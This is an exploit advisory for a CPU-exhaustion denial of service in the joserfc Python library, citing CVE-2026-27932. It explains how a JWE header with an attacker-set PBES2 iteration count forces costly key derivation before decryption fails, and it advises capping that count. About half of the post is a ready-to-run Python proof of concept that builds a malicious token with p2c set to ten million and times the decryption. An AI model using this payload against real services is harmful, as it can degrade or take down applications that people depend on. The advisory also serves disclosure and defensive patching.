📄 joserfc JWE PBES2 1.6.2 Denial of Service

=============================================================================================================================================
    | # Title     : joserfc JWE PBES2 1.6.2 Iteration Count CPU Exhaustion Denial of Service                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://pypi.org/project/joserfc/                                                                                           |
    =============================================================================================================================================
    
    [+] Summary    : A denial‑of‑service condition can occur in applications using the joserfc library when processing malicious JSON Web Encryption tokens that use the PBES2-HS256+A128KW algorithm CVE-2026-27932 .
    
    The JWE header allows the attacker to define the PBKDF2 iteration count (p2c). If an application blindly processes the token without validating this value, an attacker can supply an extremely large iteration count (e.g., 10,000,000). During decryption, the server attempts to derive the key using PBKDF2 with the attacker‑controlled iteration count.
    
    This results in excessive CPU consumption while the library performs the expensive key‑derivation operation, potentially causing CPU exhaustion and service degradation or denial of service.
    
    An attacker does not need to know the correct encryption key. The resource‑intensive key derivation step occurs before the decryption failure, allowing the attacker to repeatedly trigger heavy computation with specially crafted JWE tokens.
    
    Applications using this library should validate or cap the p2c iteration count or restrict the use of PBES2 algorithms to prevent attacker‑controlled computational workload.
    			  
    [+] POC   :  
    
    import time
    import base64
    import json
    from joserfc import jwe
    from joserfc.jwk import OctKey
    
    header = {
        "alg": "PBES2-HS256+A128KW",
        "enc": "A128CBC-HS256",
        "p2s": "Z29uZXJmYw", 
        "p2c": 10000000     
    }
    
    header_json = json.dumps(header).encode('utf-8')
    header_b64 = base64.urlsafe_b64encode(header_json).decode('utf-8').rstrip('=')
    
    malicious_token = f"{header_b64}.dummy.dummy.dummy.dummy"
    key = OctKey.import_key(b"any-password")
    
    print(f"[*] Sending malicious token with p2c={header['p2c']}...")
    print("[*] This will cause high CPU usage on the processing thread.")
    
    start_time = time.perf_counter()
    
    try:
        jwe.decrypt_compact(
            malicious_token, 
            key, 
            algorithms=["PBES2-HS256+A128KW", "A128CBC-HS256"]
        )
    except Exception as e:
        print(f"[-] Process finished with error: {e}")
    
    end_time = time.perf_counter()
    print(f"[!] Total time wasted: {end_time - start_time:.2f} seconds")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================